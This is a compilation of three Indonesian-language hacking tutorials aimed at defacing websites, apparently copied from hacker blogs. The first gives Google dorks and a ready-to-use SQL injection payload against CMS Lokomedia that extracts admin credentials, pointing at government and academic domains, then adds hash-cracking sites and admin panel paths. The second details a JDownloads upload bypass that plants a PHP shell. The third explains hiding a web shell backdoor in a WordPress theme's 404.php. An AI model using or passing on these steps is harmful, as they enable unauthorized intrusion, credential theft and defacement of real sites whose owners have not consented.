Deface poc sqli cms lokomedia

create by darkstar404

sumber :blog.garuda securityhacker.org

Tutorial Deface SQLi CMS Lokomedia

Berbicara soal teknik SQLi CMS Lokomedia ini, pasti sudah kesohor di kalangan defacer/hacker tanah air. Terlebih lagi sekarang ini yg semakin banyak defacer yang mengexploit CMS Lokomedia ini. Ga usah panjang lebar langsung ke topik pembahasan yaitu "Tutorial Deface SQLi CMS Lokomedia"

Bahan :

1. Dork : 

inurl:statis-1-profil.html

inurl:statis-2-profil.html

inurl:statis-3-strukturorganisasi.html

Note : tambahkan site:org site:net :site:go.id site:ac.id site:id

(Use Your Brain)

2. Exploit SQLi (SQL Injection) :

'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

Bingung cara ngexploit nya ?? sini di kasih tau :v

contoh : 

http://sitepemerintah.co.li/statis-2-profil.html 

kamu tambahin exploit nya sesudah angka jadi kaya gini :

http://sitepemerintah.co.li/statis-2'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html

ngerti kan ??

3. MD5 Decrypter :

MD5 Decrypt nya pake otak kamu sendiri aja :v tenang ada tool online nya kok
https://hashkiller.co.uk/md5-decrypter.aspx
http://md5online.org/

Tutorial :

1. Dorking pake dork di atas,

2. Cari targetnya, setelah ketemu masukin inject nya ! seperti contoh di atas

3. Jika Vuln akan ada kode MD5 di tab bar (liat gambar aja biar jelas)

4. Lalu kamu pencet CTRL+U lalu kamu copykan kode MD5 tersebut, lalu decrypt di MD5 Decrypter

5. Tinggal cari dimana tempat login admin nya :) biasanya ada di :
http://target-suka.co.li/admin/
http://target-suka.co.li/adminweb/
http://target-suka.co.li/admininistrator/

6. Untuk Nanem shell ?? User Your Brain Kids !! (Jgn mau nya di suapin mulu)

7. Akses shell ?? setelah nanem shell klik kanan gambar yang ancur lalu klik view image

8. Jangan lupa nitip nick _Tuan2Fay_ - Yukinoshita 47 - Snooze - TM_404 - Geonyc X

Note : tapi saya sarankan sebelum melakukan inject terhadap target, lebih baik cari dlu login adminnya :)

Karena CMS Lokomedia ini dipakai oleh web indonesia, mohon bantuan untuk tidak merusak !!
Hargai Para webmaster tanah air ini

deface poc jdownload

Deface Metode JDownloads Shell Upload Vulnerability 

ok share tutor depes lagi nih h3h3.

bagi kalian yg belum kenal gw nama gw lutfi dandy xD.kali ini deface metode JDownloads Shell Upload.
"wih nebas index ya? Ini baru yang gue mau" bcd -_-
metode ini memanfaatkan bug pada cms Joomla ea.
ok langsung wae

Dork : 
- intitle:Submit File intext:This forms allows you to inurl:upload

1. Dorking dulu di google ea trus pilih salah satu site.
2. Kalo vuln bakal kayak gambar di bawah (muncul form upload).

3. Isi formnya yang ada tanda seru/pentung aja.

4. Bagian 'select file' diisi file ext zip/rar (jangan sampe 100kb)

5. Rename shell punya lu jadi ext php.php.j misal shell.php.php.j lihat gambar (screenshotnya yang default aja, additional ga perlu)

6. Terus klik dah 'send file'.

7. Berhasil terupload kalo ada ijo ijo sama tombol plus. liat gambar.

8. Akses shellnya di site.com/images/jdownloads/screenshots/namafile.php.j ya bukan namafile.php.php.j. Soalnya itu otomatis ganti extnya :3

dor :p kalo mau nebas index backup dulu kantal :"""v jadi webmaster itu ga gampang tod >:(
oke gitu aja jangan pernah menyerah tod, yang penting usaha dulu. Dari pada lu ngemis2 h3h3

thanks to: xmall75

sumber: xmall75.blogspot.com

note:

klo mau copas ijin dulu ea,sertakan sumber.kalo gk ijin namanya maling.hargai penulis

cara menanam shell backdoor di cms wordpress

Cara Menanam Shell Backdoor di CMS Wordpress

 Xmall75 ID  07.35

Yo kelen semua yang ganteng, cantik, h3h3. W lebih ganteng tq.
Kali ini w share tutor nanem shell backdoor di CMS Wordpress.
Kayaknya sih ada 3 cara, tapi w bakal kasih 1 aja :P "ciee ga tau yang lainnya" bcd ah -_-
langsung cok :

1. Pastikan elu udah dapet username ama password target h3h3. Login dulu ke wp.

2. Kalo udah login, cari di sebelah kiri ada page Appearance > terus pilih Editor, ato kalo mau gampang tambahin theme-editor.php contohsite.com/wp-admin/theme-editor.php.

3. Cari 404.php terus klik

5. Edit isi 404.php itu dengan script shell lu.

6. Lu lihat nama themenya di URL bagian theme=misal site.com/wp-admin/theme-editor.php?file=404.php&theme=namatheme

7. Nah aksesnya di /wp-content/themes/namathemes/404.php

hwhw selesai deh terserah mau ngapain :P
Kalo mau nebas index backup dulu tod >:(
Bye bebeb :*

Thanks to: xmall75 :*

Sumber: xmall75.blogspot.com